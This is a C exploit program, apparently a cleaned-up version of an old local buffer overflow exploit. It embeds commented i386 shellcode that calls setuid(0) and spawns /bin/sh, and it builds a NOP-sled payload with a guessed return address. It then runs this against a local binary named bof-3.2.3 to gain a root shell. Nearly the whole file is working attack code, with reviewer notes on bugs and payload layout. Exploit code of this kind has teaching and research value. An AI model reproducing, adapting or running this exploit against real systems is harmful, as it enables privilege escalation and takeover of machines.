#include <errno.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#define	BUFFSIZE	1040

/*
 * i386 Linux shellcode: setuid(0) followed by execve("/bin/sh", ...).
 * 40 bytes, none of them zero, so it survives strlen()/strcpy()-style
 * copies and being handed to the victim as a C-string argv element.
 *
 * Position independence comes from the jmp/call pair: the leading jmp
 * lands on the call at the end, the call pushes the address of the
 * "/bin/sh" string that follows it and jumps back to the setuid
 * sequence, and popl %ebx then recovers that address.  The three stores
 * after the pop patch memory in place: a NUL after "/bin/sh" (string
 * offset 7) and a two-entry argv array (offsets 8 and 12) holding the
 * string pointer and NULL.
 *
 * NOTE(review): with the layout main() builds below (shellcode ends 4
 * bytes before the return address), string offset 7 is the saved-EIP
 * slot and offsets 8-15 lie just past the payload, so these writes hit
 * the victim's stack frame after the return address has already been
 * consumed -- re-check this if the payload placement is changed.
 */
char nitrous_sc[]=
                /* setuid(0): %ebx = 0 (uid), %eax = 23 (__NR_setuid) */
                "\xeb\x1a"              //jmp   $0x1a            -> the call at the end
                "\x31\xdb"              //xorl  %ebx,%ebx        <- call returns here
                "\xb0\x17"              //movb  $0x17,%al        only %al is set: if the victim leaves
                                        //                       non-zero high bytes in %eax (e.g. a strcpy
                                        //                       return value) the syscall number is wrong and
                                        //                       setuid(0) is skipped; execve below is unaffected
                "\xcd\x80"              //int   $0x80
                /* execve("/bin/sh",{"/bin/sh",NULL},NULL) */
                "\x5b"                  //popl  %ebx             %ebx = &"/bin/sh"
                "\x31\xd2"              //xorl  %edx,%edx        envp = NULL
                "\x88\x53\x07"          //movb  %dl,0x7(%ebx)    NUL-terminate the string
                "\x89\x5b\x08"          //movl  %ebx,0x8(%ebx)   argv[0] = &"/bin/sh"
                "\x89\x53\x0c"          //movl  %edx,0xc(%ebx)   argv[1] = NULL
                "\x8d\x4b\x08"          //leal  0x8(%ebx),%ecx   %ecx = argv
                "\x6a\x0b"              //pushl $0xb
                "\x58"                  //popl  %eax             %eax = 11 (__NR_execve), full register, no zero bytes
                "\xcd\x80"              //int   $0x80
                "\xe8\xe1\xff\xff\xff"  //call  -0x1f            pushes &"/bin/sh", jumps to the xorl %ebx above
                "/bin/sh";              //.string "/bin/sh"

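/*
 * Return the current stack pointer (i386 target).
 *
 * Used as the fallback return-address guess when no offset is given on
 * the command line: the victim is exec'd from this process, so its stack
 * should start near ours.
 *
 * The original relied on %eax happening to be the return register and
 * omitted the return statement -- undefined behaviour, and the compiler
 * is free to clobber %eax in the epilogue or under optimisation.  An
 * output operand lets the value flow through the compiler instead.
 * "%k0" forces the 32-bit register name so the instruction still
 * assembles when this helper is built on x86-64 (only the low 32 bits
 * of the stack pointer are captured there).
 */
unsigned long get_esp(void)
{
	unsigned long sp;

	__asm__ __volatile__("movl %%esp,%k0" : "=r"(sp));
	return sp;
}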

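/*
 * Build the overflow payload and exec the vulnerable program with it as
 * its single argument.
 *
 * Payload layout (BUFFSIZE bytes, passed to the victim as one C string):
 *   [ 0x90 NOP sled ... ][ nitrous_sc ][ 4-byte return address ]
 * The return address is 0xbffffffa minus an optional decimal offset given
 * as argv[1]; with no offset the current stack pointer is used as a guess.
 *
 * Returns only on failure (bad offset, return address containing a NUL,
 * allocation or exec failure), with the reason on stderr and status 1;
 * on success execl() replaces this process and never returns.
 */
int main(int argc, char **argv)
{
	size_t sc_len = strlen(nitrous_sc);
	uint32_t ret00rn;	/* the target is i386: the address is exactly 4 bytes */
	char *b00f;

	if (argc > 1) {
		/* strtol instead of atoi so a mistyped offset is reported
		 * rather than silently treated as 0. */
		char *end;
		long off;

		errno = 0;
		off = strtol(argv[1], &end, 10);
		if (end == argv[1] || *end != '\0' || errno == ERANGE) {
			fprintf(stderr, "bad offset: %s\n", argv[1]);
			return 1;
		}
		/* Same modular arithmetic as the original 32-bit subtraction. */
		ret00rn = (uint32_t)(0xbffffffaUL - (unsigned long)off);
	} else {
		ret00rn = (uint32_t)get_esp();
	}

	/* The victim receives the payload as a C string: a zero byte in the
	 * return address truncates it before the overflow reaches saved EIP,
	 * so fail loudly instead of sending a payload that cannot work. */
	if (memchr(&ret00rn, 0, sizeof ret00rn) != NULL) {
		fprintf(stderr, "return address 0x%08lx contains a NUL byte\n",
			(unsigned long)ret00rn);
		return 1;
	}

	if (sc_len + sizeof ret00rn > BUFFSIZE) {
		fprintf(stderr, "shellcode does not fit in %d bytes\n", BUFFSIZE);
		return 1;
	}

	/* One extra byte so the argument is a terminated string; the original
	 * handed execl() an unterminated BUFFSIZE-byte heap block. */
	b00f = malloc(BUFFSIZE + 1);
	if (b00f == NULL) {
		perror("malloc");
		return 1;
	}

	memset(b00f, 0x90, BUFFSIZE);
	memcpy(b00f + BUFFSIZE - sc_len - sizeof ret00rn, nitrous_sc, sc_len);
	/* memcpy rather than a pointer cast: writes exactly 4 bytes whatever
	 * the host's sizeof(unsigned long) (the cast wrote 8 on a 64-bit host,
	 * overflowing the heap block) and avoids an unaligned aliasing store. */
	memcpy(b00f + BUFFSIZE - sizeof ret00rn, &ret00rn, sizeof ret00rn);
	b00f[BUFFSIZE] = '\0';

	/* execl is variadic: the terminator must be a char pointer, not a
	 * bare NULL that might be a plain int 0. */
	execl("./bof-3.2.3", "bof-3.2.3", b00f, (char *)NULL);
	perror("execl");
	free(b00f);
	return 1;
}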
